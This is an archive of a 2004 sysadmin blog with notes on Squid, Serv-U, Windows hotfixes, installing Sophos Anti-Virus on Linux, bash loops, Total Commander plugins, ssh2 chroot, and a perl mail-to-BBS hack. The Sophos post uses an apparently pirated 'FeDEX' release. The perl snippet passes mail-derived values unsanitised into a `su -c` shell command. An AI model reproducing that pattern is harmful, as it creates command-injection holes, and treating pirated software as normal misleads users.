deny_info ERR_PORN_DENIED porn all

-----> /etc/squid/errors/ERR_PORN_DENIED
.....Access Filtered......

Posted by windtear at 5:34 PM
squid-2.5.STABLE5 and some IPCN adjustments
http://www.squid-cache.org/Versions/v2/2.5/
http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE5.tar.bz2
http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE5.tar.gz
http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE5-20040416.tar.bz2

1045200 Apr 16 08:11 squid-2.5.STABLE5-20040416.tar.bz2
45ed1b1cd492e3f529085d09c3ffc1b8 squid-2.5.STABLE5.tar.bz2
0946c53dbf2f091629092fd792df2820 squid-2.5.STABLE5.tar.gz
e11316d0f2a08075e6af6ad80d43c5cf squid-2.5.STABLE5-20040416.tar.bz2

% @RH7.3
Name        : squid                             Relocations: (not relocateable)
Version     : 2.4.STABLE6                            Vendor: Red Hat, Inc.
Release     : 6.7.3                              Build Date: Fri 28 Jun 2002 08:45:26 AM CST
Install date: Tue 10 Jun 2003 05:24:29 PM CST      Build Host: stripples.devel.redhat.com
Group       : System Environment/Daemons         Source RPM: squid-2.4.STABLE6-6.7.3.src.rpm
Size        : 2659299                               License: GPL
Packager    : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
Summary     : The Squid proxy caching server.
Description :
Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. Unlike traditional caching software, Squid handles all requests in a single, non-blocking, I/O-driven process. Squid keeps meta data and especially hot objects cached in RAM, caches DNS lookups, supports non-blocking DNS lookups, and implements negative caching of failed requests.

Squid consists of a main server program squid, a Domain Name System lookup program (dnsserver), a program for retrieving FTP data (ftpget), and some management and client tools.

* Wed Jun 26 2002 Bill Nottingham <notting@redhat.com>
- add various upstream bugfix patches
* Sat Jun 22 2002 Tim Powers <timp@redhat.com>
- automated rebuild
* Fri May 24 2002 Tim Powers <timp@redhat.com>
- automated rebuild
* Sat Mar 23 2002 Bill Nottingham <notting@redhat.com>
- 2.4.STABLE6

Changes to Squid-2.4.STABLE6 (March 19, 2002):

http://www.squid-cache.org/Versions/v2/2.5/ChangeLog.txt
Changes to squid-2.5.STABLE5 (1 Mar 2004):
 - cache.log message on "squid -k reconfigure" was slightly confusing, claiming Squid restarted when it just reread the configuration.
 - Bug #787: digest auth never detects password changes
 - Bug #789: login with space confuses redirector helpers
 - Bug #791: FQDNcache discards negative responses when using internal DNS
 - pam_auth fails on Solaris when using pam_authtok_get. Persistent PAM connections are unsafe and now disabled by default.
 - auth_param documentation clarifications and added default realm values making only the helper program a required attribute
 - Bug #795: German ERR_DNS_FAIL correction
 - Bug #803: Lithuanian error messages update
 - Bug #806: Segfault if failing to load error page
 - Bug #812: Mozilla/Netscape plugins mime type defined (.xpi)
 - Bug #817: maximum_object_size too large causes squid not to cache
 - Bug #824: 100% CPU loop if external_acl combined with separate authentication acl in the same http_access line
 - squid_ldap_group updated to version 2.12 with support for ldaps:// (LDAPv2 over SSL) and a number of other improvements.
 - Bug #799: positive_dns_ttl ignored when using internal DNS.
 - Bug #690: Incorrect html on empty Gopher responses
 - Bug #729: --enable-arp-acl may give warning about net/route.h
 - Bug #14: attempts to establish connection may look like syn flood attack if the contacted server is refusing connections
 - errorpage README files included in the distribution again showing who contributed which translation
 - Bug #848: connect_timeout ends up twice the length. forward_timeout option added to address this.
 - Bug #849: DNS log error messages should report the failed query
 - Bug #851: DNS retransmits too often
 - Bug #862: Very frequently repeated POST requests may cause a filedescriptor shortage due to persistent connections building up
 - Bug #853: Sporadic segmentation faults on aborted FTP PUT requests
 - Bug #571: Need to limit use of persistent connections when filedescriptor usage is high
 - Bug #856: FTP/Gopher Icon URLs are unneededly complex and often do not work properly
 - Bug #860: redirector_access does not handle "slow" acls such as "dst" or "external" requiring an external lookup.
 - Bug #865: Persistent connection usage too high after sudden burst of traffic.
 - Bug #867: cache_peer max-conn=.. option does not work
 - Bug #868: refuses to start if pid_filename none is specified
 - Bug #887: LDAP helper -Z (TLS) option does not work
 - Bug #877: Squid doesn't follow telnet protocol on FTP control connections
 - Bug #908: Random auth popups and account lockouts when using ntlm
 - Support for NTLM_NEGOTIATE exchanges with ntlm helpers
 - Bug #585: cache_peer_access fails with NTLM authentication
 - Bug #592: always/never_direct fails with NTLM authentication
 - wbinfo_group update for Samba-3
 - Bug #892: helpers/ntlm_auth/SMB/ fails to compile on FreeBSD 5.0
 - Bug #924: miss_access restricts internal and cachemgr requests even if these are local
 - Bug #925: auth headers sent by squidclient are mildly malformed
 - Bug #922: miss_access and delay_access and several other authentication related bug fixes.
 - Bug #909: Added ARP acl support for FreeBSD
 - Bug #926: deny_info with http_reply_access or miss_access
 - Bug #872: reply_body_max_size problems when using NTLM auth

Posted by windtear at 4:18 AM
April 16, 2004
Serv-U FTP Server Version 5.0 (5.0.0.9) Release 我爱网络
http://www.Serv-U.com/ (Serv-U is published by RhinoSoft.com)
ftp://ftp.cat-soft.com/ServUSetup.exe
3,881,340 bytes 2004/04/15 15:18:41
68cf5d28166552ee3a92113b0280a794 *ServUSetup.exe

Version 5.0 (5.0.0.9) Released 15 April 2004
--------------------------------------------
* Fixed bug in performance counters, value for 'Total KB transferred' was wrong.
* Fixed bug in path parser causing crashes for certain paths.
* Added ODBC connection retry in case connection fails immediately after server start.
* Changed registration key mechanism, key is valid when the last major version was released within update period.
* Ported code to Borland C++ Builder v6.
* Fixed a number of Admin bugs causing crashes.
* Fixed bug in Daemon dir listing code causing crashes.
* Fixed bug causing crashes on Daemon exit.
* Changed MDTM so it can now change the date/time of directories as well as files.
* Added support for SSCN command.
* Added better crash logging to Administrator program, logs to file ServUCrashReport.elf.

Version 5.0 (5.0.0.4) Released 23 February 2004
-----------------------------------------------
* Changed Windows' port checking code to better detect ports in paths.
* Fixed bug where enabling/disabling directory cache does not get saved.
* Fixed bug of tray-icon not starting automatically upon reboot.
* Fixed SQL statement bug for lookups in dir access and IP access rules tables.
* Added domain settings option to auto-create homedir if it doesn't exist.
* Added automatic connection retry in case ODBC connectivity is lost.
* Fixed bug in access DLL mechanism, causing events to not get dispatched under certain circumstances.
* Fixed bug causing SSL transfers to fail when a speed limit is used.
* Fixed bug in MDTM command that potentially caused the daemon to crash.

Version 5.0 (5.0.0.0) Released 20 January 2004
----------------------------------------------
* Added support for user account setting that requires a secure connection to log in.
* Added 'Apply' and 'Restore' buttons to various panes.
* Added support for NLST command to list dirs on a per-domain basis.
* Fixed bug in deleting user accounts starting with same partial name.
* Added 'up' button to Administrator program.
* Added XCRC support.
* Added support for independent server-level uplink/downlink bandwidth limits.
* Changed Admin code to trap certain exceptions in XP.
* Fixed bug not showing custom domain message for "no anonymous access".
* Added code to auto-create user's homedir if it does not exist yet.
* Added support for more SSL ciphers.
* Added code to enforce that domain/group admins cannot assign rights they don't have.
* Changed symbolic message parameters to show "unlimited" when needed.
* Added support for putting individual domains online/offline.
* Fixed bug causing crashes when using "%ServerAvg" message directive.
* Fixed XP problem with long server startup times.
* Fixed bug in dir listing of root dirs with path as argument.
* Changed check for the need of a secure connection from PASS to USER command.
* Fixed bug with Windows 2003 in setting up listening sockets.
* Changed MDTM command to work with UTC instead of local time.
* Changed PORT command to block use of ports below 1024.
* Fixed bug causing use of ports (ie. printing-via-FTP) to fail.
* Changed NLST command to return 550 error reply in case no entries are found.
* Made tray icon persistent in case of Explorer crashes/restarts.
* Added ODBC database support.
* Fixed bug causing disk quota to fail under certain conditions.
* Added license volume checking.
* Added per-domain user/group account settings cache time-to-live.
* Changed password encryption from a server-wide setting to a per-domain setting.
* Changed listening socket handling, now running in separate thread.
* Fixed bug in dir listing cache, when caching more than 63 entries.
* Fixed buffer overflow bug in MDTM command.
* Added support for CLNT command.
* Added support for Corporate Edition.

Version 4.1 (4.1.0.3) Released 3 January 2003

THE SERV-U PROMO MESSAGE
========================
This is Serv-U version 5.0, a flexible FTP server (or Daemon) for all 32-bit versions of MS-Windows (Win95, Win98, WinME, NT, Win2000, Win2003, XP). It turns any PC with a network connection into an FTP site on the Internet.
Serv-U offers the following:
* Easy to set up and use.
* A Windows standard, with over 50000 registered users!
* Support for Secure-FTP through SSL/TLS.
* Support for ODBC databases for accounts.
* Lots of security through passwords, read/write/append/modify rights per directory or file for each user (including Anonymous), and access restrictions based on IP address.
* Fast and rock solid!
* Multiple 'virtual' FTP servers can be set up on a single instance of Serv-U.
* Server can be administered remotely.
* Supports S/KEY one-time passwords.
* Can run as a native 'system service' in NT, Windows 2000/2003 and Windows 95/98/ME/XP.
* Support for temporary accounts that are automatically deleted upon expiration.
* Support for UL/DL ratios, disk quota limitations, network bandwidth limiting, and automatic anti-anti-time-out plus anti-hammering measures.
* Full UNC path support.
* Support for virtual paths. Directories or drives can be mapped to any location in a user's directory structure.
* Support for 'links' such as those used in UNIX.
* Full support for all 'ls' directory listing options.
* Support for messages to users, or from users to the server.
* Users can be put into groups for easy maintenance of large numbers.
* A complete implementation of the FTP standard in RFC959, RFC1123, RFC1760, RFC2228, RFC2246, RFC2289, RFC2389 and the Secure-FTP draft.
* Supports resuming of file uploads and downloads.
* Configurable messages for sign-on, sign-off, login, and directory changes.
* Has time-out and time-limit features, so connections are automatically cleared when idle, hung, or connected too long.
* Easy to setup and maintain through a separate administrator program. For automated maintenance the settings are stored in either an .INI file, registry, or ODBC database of simple format.
* Has an open architecture which makes monitoring, changing and extending the server behavior possible through external DLLs.
* Logs all transactions to file and screen that can be read by other applications. Includes unique session IDs, time, and date stamps.
Posted by windtear at 5:06 PM
W2K_CHS 5 updates (20040414) up to blueink 我爱网络
Full versions copied straight out of SUS; the installation no longer needs to download anything from the network.
ftp://soft.blueink.org:2121/incoming/other/WindowsUpdate---5个关键更新/ (someone has already uploaded the 2k3 and XP ones to the same directory)
W2K_CHS/
├─com_microsoft.Q837009_OE6_SP1
│ OE6.0sp1-KB837009-x86-CHS_3f82d910a06a016e62e085b3791bb5e.exe
│
├─com_microsoft.Q831167_IE6_SP1
│ Q831167_7c1186c6a85526a0a88f4d6d01c8bba.exe
│
├─com_microsoft.837001_W2K_SP5_WinSE_84422
│ Windows2000-KB837001-x86-CHS_f9aef1eaf7c9990dfad809b64dff6d4.EXE
│
├─com_microsoft.828741_W2K_SP5_WinSE_61239
│ Windows2000-KB828741-x86-CHS_e5de3240894fc24df06671c42a613c4.EXE
│
└─com_microsoft.835732_W2K_SP5_WinSE_84207
  Windows2000-KB835732-x86-CHS_779d1b67c993ed5edaeeb6706f37a0d.EXE
[Related article] http://www.smth.edu.cn/pc/pccon.php?id=10&nid=21253&s=all
Posted by windtear at 11:09 AM
April 15, 2004
SOPHOS.ANTIVIRUS.V3.80.MULTILANGUAGE.LINUX-FeDEX 我爱网络
% for i in *.zip;do echo $i;unzip -o $i;done (unzip -o *.zip didn't work)
% rm -f *.zip
% unrar x -o+ fedl80.rar
% rm -f fedl80.r??
% cd SOPHOS.ANTIVIRUS.V3.80.MULTILANGUAGE.LINUX-FeDEX/
% l
total 25783
-rw-r--r-- 1 root root 1104 Nov 21 07:29 dm.nfo
drwxr-xr-x 2 root root 2520 Mar 18 20:48 sav-install/
-rw-r--r-- 1 root root 8850917 Mar 26 13:45 linux.intel.libc6.tar.Z
-rw-r--r-- 1 root root 8760745 Mar 26 13:46 linux.intel.libc6.glibc.2.2.tar.Z
-rw-r--r-- 1 root root 8765449 Mar 26 13:46 linux.intel.libc5.tar.Z
-rw-r--r-- 1 root root 7715 Mar 26 13:46 fedex.nfo
-rw-r--r-- 1 root root 740 Mar 26 13:47 file_id.diz
% tar Zxvf linux.intel.libc6.glibc.2.2.tar.Z
sav-install/
sav-install/vdl-3.80.dat
sav-install/vdl01.vdb
sav-install/vdl02.vdb
sav-install/vdl03.vdb
sav-install/vdl04.vdb
sav-install/vdl05.vdb
sav-install/vdl06.vdb
sav-install/vdl07.vdb
sav-install/vdl08.vdb
sav-install/vdl09.vdb
sav-install/vdl10.vdb
sav-install/vdl11.vdb
sav-install/vdl12.vdb
sav-install/vdl13.vdb
sav-install/vdl14.vdb
sav-install/vdl15.vdb
sav-install/vdl16.vdb
sav-install/install.sh
sav-install/Readunix.txt
sav-install/Readunix_de.txt
sav-install/Readunix_es.txt
sav-install/Readunix_euc.txt
sav-install/Readunix_fr.txt
sav-install/Readunix_it.txt
sav-install/Readunix_pt_br.txt
sav-install/Readunix_utf.txt
sav-install/Install.txt
sav-install/Install_de.txt
sav-install/Install_es.txt
sav-install/Install_euc.txt
sav-install/Install_fr.txt
sav-install/Install_it.txt
sav-install/Install_pt_br.txt
sav-install/Install_utf.txt
sav-install/installmsg.txt
sav-install/installmsg_de.txt
sav-install/installmsg_es.txt
sav-install/installmsg_euc.txt
sav-install/installmsg_fr.txt
sav-install/installmsg_it.txt
sav-install/installmsg_pt_br.txt
sav-install/installmsg_utf.txt
sav-install/sweep.1
sav-install/icheckd.1
sav-install/icheckd.conf.5
sav-install/icheckd_de.1
sav-install/icheckd_de.conf.5
sav-install/icheckd_es.1
sav-install/icheckd_es.conf.5
sav-install/icheckd_euc.1
sav-install/icheckd_euc.conf.5
sav-install/icheckd_fr.1
sav-install/icheckd_fr.conf.5
sav-install/icheckd_it.1
sav-install/icheckd_it.conf.5
sav-install/icheckd_pt_br.1
sav-install/icheckd_pt_br.conf.5
sav-install/icheckd_utf.1
sav-install/icheckd_utf.conf.5
sav-install/sweep_de.1
sav-install/sweep_es.1
sav-install/sweep_euc.1
sav-install/sweep_fr.1
sav-install/sweep_it.1
sav-install/sweep_pt_br.1
sav-install/sweep_utf.1
sav-install/eminstall.txt
sav-install/eminstall.sh
sav-install/calcmd5
sav-install/icheckd
sav-install/icmess.dat
sav-install/libsavi.so.3.2.07.060
sav-install/sweep
sav-install/swpmess.dat
% l
total 8559
drwxr-xr-x 2 root root 2520 Mar 18 20:48 sav-install
-rw-r--r-- 1 root root 8760745 Apr 15 23:13 linux.intel.libc6.glibc.2.2.tar.Z
% cd sav-install/
% ./install.sh
Sophos Anti-Virus installation utility [Linux/Intel]
Copyright (c) 1998,2003 Sophos Plc, Oxford, England
Error: The 'sweep' user does not exist on your system. Please consult the documentation for more information.
% useradd sweep
% ./install.sh
Sophos Anti-Virus installation utility [Linux/Intel]
Copyright (c) 1998,2003 Sophos Plc, Oxford, England
Ensure that IDE files for this release are now downloaded into /usr/local/sav.
% sweep --help
SWEEP virus detection utility
Version 3.80, April 2004 [Linux/Intel]
Includes detection for 89009 viruses, trojans and worms
Copyright (c) 1989,2004 Sophos Plc, www.sophos.com
System time 23:15:56, System date 15 April 2004
Command line qualifiers are: --help
Warning: SWEEP messages loaded from default locale en_GB
The following options may be prefixed with 'n' to invert their meaning
(for example, '-nsc' is the inverse of '-sc'). [*] indicates the option
is the default:
 -sc [*] : SWEEP inside dynamically compressed executables
 -f [ ] : Full SWEEP
 -di [ ] : Disinfect infected items
 -s [*] : Run silently (do not list files swept)
 -c [*] : Ask for confirmation before disinfection/deletion
 -b [*] : Sound bell on virus detection
 -all [ ] : SWEEP all files
 -rec [*] : Do recursive SWEEP
 -remove [ ] : Remove infected objects
 -dn [ ] : Display names of files as they are scanned
 -ss [ ] : Don't display anything except on error or virus
 -eec [ ] : Use extended error codes
 -ext=XXX,.. : Specify additional extensions to SWEEP
 -p=<file> : Write to logfile <file>
 -idedir=<dir> : Read IDEs from alternative directory
 -v : Display complete version information and exit
 -h : Display this help and exit
The following options are related to archives and other special file types:
 -zip [ ] : SWEEP inside ZIP archives
 -gzip [ ] : SWEEP inside GZIP compressed files
 -arj [ ] : SWEEP inside ARJ archives
 -cmz [ ] : SWEEP inside Unix-compressed files
 -tar [ ] : SWEEP inside TAR archives
 -rar [ ] : SWEEP inside RAR archives
 -archive [ ] : All of the above
 -cab [ ] : SWEEP inside Microsoft Cabinet files
 -loopback [ ] : SWEEP inside loopback-type files
 -mime [ ] : Scan files encoded in MIME format
 -oe [ ] : Scan Microsoft Outlook Express mailbox files (requires -mime)
 -tnef [ ] : SWEEP inside TNEF files
The following options may be prefixed with 'no-' to invert their meaning
(for example, '--no-reset-atime' is the inverse of '--reset-atime'. [*]
indicates the option is the default:
 --reset-atime [*] : Reset file access time after SWEEPing
The following options are Unix-specific, and may be prefixed with 'no-'
to invert their meaning (for example, '--no-follow-symlinks' is the
inverse of '--follow-symlinks'). [*] indicates the option is the default:
 --follow-symlinks [*] : SWEEP the object pointed to by symbolic links
 --stay-on-filesystem [ ] : Attempt not to leave the starting filesystem (i.e. do not traverse mount points)
 --stay-on-machine [*] : Attempt not to leave the starting machine (i.e. do not traverse remote mount points)
 --skip-special [*] : Do not scan 'special' objects (/dev, /proc, /devices etc.)
 --backtrack-protection [*] : Prevent repetition of work ('backtracking') due to symbolic links
 --preserve-backtrack [*] : Preserve the backtracking information for the duration of this run
 --examine-x-bit [ ] : Check files with an execute bit set
 --show-file-details [ ] : Show file ownership and permissions when displaying filenames
 --quarantine [ ] : (Simple form of --quarantine option) If file is infected with virus, attempt to change file owner to user running SWEEP, and permissions to -r-------- (0400)
 --quarantine:<uid=nnn>,<user=username>,<gid=nnn>,<group=groupname>,<mode=ppp> [ ] : (Detailed form of --quarantine option) If file is infected with virus, attempt to change file ownership, group ownership, and permissions to those specified as uid/username, gid/groupname, and mode.
 --args-file=<file> : Read command line arguments (both options and directory/filenames) from file, taking arguments from the command line again when the end of the file is reached. A value of - for <file> specifies taking input from stdin. A small number of command line options may not be used within an args file, namely:- -eec, -neec, -p=, -s, -ns, -dn, -ndn. These can only be specified from the command line.
The following options are specific to Linux and FreeBSD only.
 -mbr [ ] : SWEEP master boot records on all (physical) hard disks
 -bs=X,... [ ] : SWEEP boot sector of each drive listed
 -bs [ ] : SWEEP boot sectors on all (logical) drives
 -cdr=X,...[ ] : Scan boot sector in bootable image of each CD drive listed
You need to have superuser rights in order to scan boot sectors.
......
% pwd
/var/mail/Mail/e/b/windtear@ipcn.org/Mail
% sweep 282041380.20400
SWEEP virus detection utility
Version 3.80, April 2004 [Linux/Intel]
Includes detection for 89009 viruses, trojans and worms
Copyright (c) 1989,2004 Sophos Plc, www.sophos.com
System time 23:19:54, System date 15 April 2004
Warning: SWEEP messages loaded from default locale en_GB
Quick Sweeping
1 file swept in 14 seconds.
No viruses were discovered.
End of Sweep.
......
% /usr/local/bin/sweep -nc -remove /datacenter/datacenter/
SWEEP virus detection utility
Version 3.80, April 2004 [Linux/Intel]
Includes detection for 89009 viruses, trojans and worms
Copyright (c) 1989,2004 Sophos Plc, www.sophos.com
System time 23:22:49, System date 15 April 2004
Command line qualifiers are: -nc -remove
Warning: SWEEP messages loaded from default locale en_GB
Quick Sweeping
......
1848 files swept in 1 minute and 7 seconds.
1 error was encountered.
345 viruses were discovered.
345 files out of 1848 were infected.
Please send infected samples to Sophos for analysis.
For advice consult www.sophos.com, email support@sophos.com
or telephone +44 1235 559933
End of Sweep.
% /usr/local/bin/sweep -nc -remove /datacenter/datacenter/
SWEEP virus detection utility
Version 3.80, April 2004 [Linux/Intel]
Includes detection for 89009 viruses, trojans and worms
Copyright (c) 1989,2004 Sophos Plc, www.sophos.com
System time 23:22:49, System date 15 April 2004
Command line qualifiers are: -nc -remove
Warning: SWEEP messages loaded from default locale en_GB
Quick Sweeping
Could not check /datacenter/datacenter/incoming/临时文件/考勤安装/我的公文包/教学文档/培训人员通信录.doc (corrupt)
1503 files swept in 38 seconds.
1 error was encountered.
No viruses were discovered.
End of Sweep.
[Related article] http://www.smth.edu.cn/pc/pccon.php?id=10&nid=15837&s=all
Posted by windtear at 11:28 PM
bash scripts sample - for loop vs. xargs 我爱网络
-----> Demand:
getpoints 1.jpg 1.points
getpoints 2.jpg 2.points
...
% cat list.txt
1.jpg
2.jpg
...
-----> Solution:
1.
for i in `cat list.txt`;do ./getpoints $i $i.points;done
rename jpg.points points *.points
2. (by newclear)
cat list.txt | sed -e "s/\..*//" | xargs --replace ./getpoints {}.jpg {}.points
-----> Demo
% for i in `cat list.txt`;do echo $i $i.points;done
1.jpg 1.jpg.points
2.jpg 2.jpg.points
3.jpg 3.jpg.points
rename jpg.points points *.points
% cat list.txt | sed -e "s/\..*//" | xargs --replace echo {}.jpg {}.points
1.jpg 1.points
2.jpg 2.points
3.jpg 3.points
Posted by windtear at 6:17 PM
Update Plugins for TC (Total Commander 6.03) 我爱网络
rpm.wcx 1.1.0.188 2002/12/02 15:09:12
cpio.wcx 1.0.0.79 2002/09/24 17:24:40
iso.wcx 1, 6, 9, 0 2004/04/08 14:31:28
msi-plus.wcx 0.4 2003/11/19 09:13:00
img.wcx *1.5 2003/07/31 00:00:00
bzip2dll.wcx *1.0 2001/12/19 15:11:10
chmdir.wcx *0.21 beta 2003/12/08 14:20:00
z.wcx 0.2 2001/10/04 00:00:00
-----> Lister
mmedia.wlx 2, 4, 4, 0 2004/01/19 08:56:00
office.wlx *1.1+ 2003/11/19 09:13:00
pdfview.wlx 1, 0, 5, 0 2004/02/04 20:36:00
fileinfo.wlx 2, 0, 1, 0 2004/03/20 17:05:50
ieview.wlx *Beta 4 2002/12/21 00:00:00
excellence.wlx 1.02 2004/01/26 02:02:42
flashview.wlx 1.2.0.0 2003/12/02 23:34:08
SynUs.wlx 1.6.0.0 2003/10/23 02:10:40
syntaxcolorizer.wlx 1, 1, 0, 0 2003/02/24 21:19:54
Imagine.wlx 0.8.4.0Beta2 2004/03/18 08:40:00
-----> Filesys
PROCFS.wfx *2.0 2003/11/19 09:15:00
Privileges.wfx 1, 0, 0, 1 2002/11/27 00:00:00
Services.wfx 2, 4, 0, 203 2004/03/10 16:29:00
app2srv.exe *Services2.4 2004/03/10 19:53:00
UnInstTC.wfx *1.52 2004/01/31 16:53:00
registry.wfx 2, 0, 0, 0 2003/11/26 13:57:00
startupguard.wfx 0.5.1.56 2003/11/05 17:00:00
Posted by windtear at 4:02 PM
Total Commander 6.03 Final - TC, my favorite (formerly wincmd - Windows Commander) 我爱网络
http://www.ghisler.com/
Total Commander, Version 6.03, is a Shareware file manager for Windows® 95/98/ME/NT/2000/XP, and Windows® 3.1.
New (April 14): Total Commander 6.03 for Windows released
New (August 22): Total Commander CE/Pocket 1.2 released
November 2: Name change to Total Commander!
Important note: Changes for orders from Germany, U.K. and Belgium!
Features in Total Commander 6.03 now include:
Two file windows side by side
Multiple language
Posted by windtear at 10:38 AM
my attempt about 2 mail and 1 bbs 我爱网络
qmail and another
bbsmail (perl script)
mailgate.pl (perl script)
mail2bbs (exe binary with suid)
-rwsr-x--- 1 bbs bbs 465274 Aug 28 2003 mail2bbs
-rwxr-x--- 1 bbs bbs 2763 Apr 14 18:34 mailgate.pl
-rwxr-x--- 1 bbs bbs 2039 Apr 14 20:17 bbsmail
port 25 by another smtpd
deliver by an exe named by local
what i can do is
write a perl script 'local' to replace the orig one
judge the deliver target to the 'another' email system or bbs?
virus
spam
log
...
if ( $ARGV[0] ne "" ) {
  $file_var=$ARGV[0];
} else {
  print "usage: local.pl 237453115.32606\n";
  exit;
}
...
($file_name,$file_ext) = split(/\./,$file_var);
$dir_name=$file_name%32;
if (length($dir_name) == 1) {
  $dir_name="0".$dir_name;
}
-----> but defeated by it
maybe coz of permission
so another script is coming
...
`su - bbs -c "/home/bbs/bin/bbsmail $to_user /$another_mail_dir/$dir_name/$file_var"`;
unlink ...
cat /dev/null > $the_to_do_list_file
Posted by windtear at 12:34 AM
April 14, 2004
MICROSOFT SECURITY UPDATES ALERT April 13, 2004 - Windows Security Updates for April 2004 我爱网络
Windows Security Updates for April 2004
Published: April 13, 2004
http://go.microsoft.com/?LinkID=466770
http://www.microsoft.com/security/security_bulletins/200404_windows.asp
The Microsoft® Windows® security updates for April 2004 address newly discovered issues in Windows, including Microsoft Outlook Express, a component of Windows. If you have any of the listed software installed on your computer, you should visit the Windows Update Web site to install related updates.
Posted by windtear at 11:39 AM
Challenging security - ssh2 & chroot 我爱网络
chroot(PATH)
bin
dev
etc
lib
proc
http://www.ssh.org/
http://www.ssh.com/support/downloads/secureshellserver/non-commercial.html
ftp://ftp.ssh.com/pub/ssh
> ls
-rwxrwxr-x 1 2012 2012 2269281 Dec 3 15:24 ssh-3.2.9.1.tar.gz
-rwxrwxr-x 1 2012 2012 72 Dec 3 16:12 ssh-3.2.9.1.tar.gz.sig-gpg
-rwxrwxr-x 1 2012 2012 280 Dec 3 16:12 ssh-3.2.9.1.tar.gz.sig-pgp2
-rwxrwxr-x 1 2012 2012 65 Dec 3 16:12 ssh-3.2.9.1.tar.gz.sig-pgp5
ssh-3.2.9.1.tar.gz
Modify: Wed Dec 3 21:24:22 2003
md5sum
f3ed49f13419d97dc1d0d3bfb4bb99bf ssh-3.2.9.1.tar.gz
sshd2: SSH Secure Shell 3.2.9.1 (non-commercial version) on i686-pc-linux-gnu
-----> etc configs
knownhosts/
hostkeys/
subconfig/
ssh_dummy_shell.out
sshd2_config.example
ssh2_config.example
ssh2_config
hostkey.pub
hostkey
sshd2_config
subconfig/
  anonymous.example
  host_ext.example
  host_int.example
  user.example
% cat sshd2_config
Port 22
SettableEnvironmentVars LANG,LC_(ALL|COLLATE|CTYPE|MONETARY|NUMERIC|TIME),PATH,TERM,TZ
DenyGroups nobody,guest,anonymous
PermitRootLogin no
ChRootGroups ftpadmin
subsystem-sftp sftp-server
-----> README
SSH2 Binaries
=============
  ssh2            The SSH2 client.
  sshd2           The SSH2 daemon.
  sftp2           The SFTP client (needs ssh2). Type "?" in the command line for help.
  sftp-server2    The SFTP server (executed by sshd2).
  scp2            The SCP client.
  ssh-keygen2     The utility for generating keys. Use -h for help.
  ssh-add2        Add identities to the authentication agent.
  ssh-agent2      The authentication agent.
  ssh-askpass2    X11 utility for querying passwords.
  ssh-signer2     A small program that signs "hostbased" authentication packets. Executed by ssh2, and for proper function, must be suid root. (This is done by 'make install'.)
  ssh-probe2      Program to probe a given network for ssh2 servers. See ssh-probe(1) and sshd2_config(5) for MaxBroadcastsPerSecond.
  ssh-dummy-shell Can be used as a restricted shell when only file transfer or tcp forwarding functionality is desired.
  ssh-certenroll2 A certificate enrollment client (only in commercial distribution)
  sshd-check-conf A configuration checker utility for use with sshd2

Installation
============
  % tar zxvf ssh-3.x.y.tar.gz
  % ./configure
  % make
  # make install
This should set everything up and create the host key.
The old files are moved to *.old files. If you don't want them around, goto apps/ssh and run
  # make clean-up-old
which will delete them.

ssh2 files
==========
Public keys have a .pub suffix, private keys have no suffix. For example:
  id_dsa_1024_a      A 1024-bit DSA private key
  id_dsa_1024_a.pub  The corresponding public key
There is no "known_hosts", as in ssh1. The host keys are stored in separate files in ~/.ssh2/hostkeys .

~/.ssh2/hostkeys/key_xxxx_yyyy.pub
----------------------------------
This would be the public host key of the ssh2 daemon running in port xxxx of the host yyyy.

/etc/ssh2/hostkey.pub and /etc/ssh2/hostkey
-------------------------------------------
Public and private hostkeys for sshd2. Created by "make install". If this is not created by "make install" or you need to recreate your host keypair, run
  # rm /etc/ssh2/hostkey*
  # ssh-keygen2 -P /etc/ssh2/hostkey

~/.ssh2/identification
----------------------
Lists the private keys that are offered to the server in public-key user authentication.
  # identification
  IdKey id_dsa_1024_a
This means that the private key in the file ~/.ssh2/id_dsa_1024_a is used for public key authentication. Use CertKey instead of IdKey if certificates are used (only in commercial distribution).

~/.ssh2/authorization
---------------------
Lists the public keys that are accepted for authentication on this host.
  # authorization
  Key id_dsa_1024_a.pub
This means that anyone who holds the matching private key to the public key in the file $USER/.ssh2/id_dsa_1024_a.pub can log in as $USER.

/etc/ssh2/sshd2_config
----------------------
The server configuration file, copied here by "make install". See the man page for details. The line:
  subsystem-sftp sftp-server
means that when the subsystem "sftp" is requested, the command "sftp-server" is started. For example, if our sshd2_config reads:
  subsystem-quux echo "fim fam foo"
the command "ssh2 host -s quux" would simply print the text "fim fam foo".

~/.ssh2/ssh2_config
-------------------
The client configuration file. See the global client config file ssh2_config in /etc/ssh2.

~/.ssh2/knownhosts/xxxxyyyy.pub
-------------------------------
These are the public host keys of the hosts that a user wants to log from using host based authentication (equivalent with SSH1's RhostsRSAAuthentication). Also, a user has to set up her/his ~/.shosts (which only SSH uses) or ~/.rhosts file (insecure, as it is also used by the r*-commands). If the username is the same in both hosts, it is adequate to put the public hostkey to /etc/ssh2/knownhosts and add the host's name to /etc/shosts.equiv (or /etc/hosts.equiv).
xxxx denotes the hostname (FQDN) and yyyy the public key algorithm of the key. For example, zappa.foo.fi's hostkey algorithm is ssh-dss. The hostkey would be named zappa.foo.fi.ssh-dss.pub in the knownhosts directory. Possible values for publickey-algorithms are "ssh-dss" and "ssh-rsa" (without the quotes).

/etc/ssh2/knownhosts/xxxxyyyy.pub
---------------------------------
As above, but system-wide. These can be overridden by the user by putting a file with the same name to her/his ~/.ssh2/knownhosts directory.

/etc/hosts.equiv and /etc/shosts.equiv
--------------------------------------
Used to check whether authentication from host is allowed using host based authentication. In its simplest form, the file contains host names, one per line. For more information, see 'man sshd2'.

~/.rhosts and ~/.shosts
-----------------------
This file contains host-username-pairs, separated by spaces, one per line. The given user from the specified host is allowed to log in without a password. For more information, see 'man ssh2' and 'man sshd2'.

=====
chroot
@ v2.4.0 by flyriver
sshchsession.c
ssh_session_init_env
    if (!strcmp("ftpadmin", ssh_group_name(session->common->user_data)))
    {
      char home_dir[512];
      snprintf(home_dir, sizeof(home_dir), "/home/%s", user_name);
      ssh_child_set_env(envp, envsizep, "HOME", home_dir);
    }
    else
      ssh_child_set_env(envp, envsizep, "HOME", user_dir);
ssh_channel_session_child
sshunixuser.c
@ v3.2.9.1
sshchsession.c
ssh_session_init_env
 492   if (ssh_user_needs_chroot(session->common->user_data, session->common))
 493     user_dir = "/";
 494   else
 495     user_dir = ssh_user_dir(session->common->user_data);
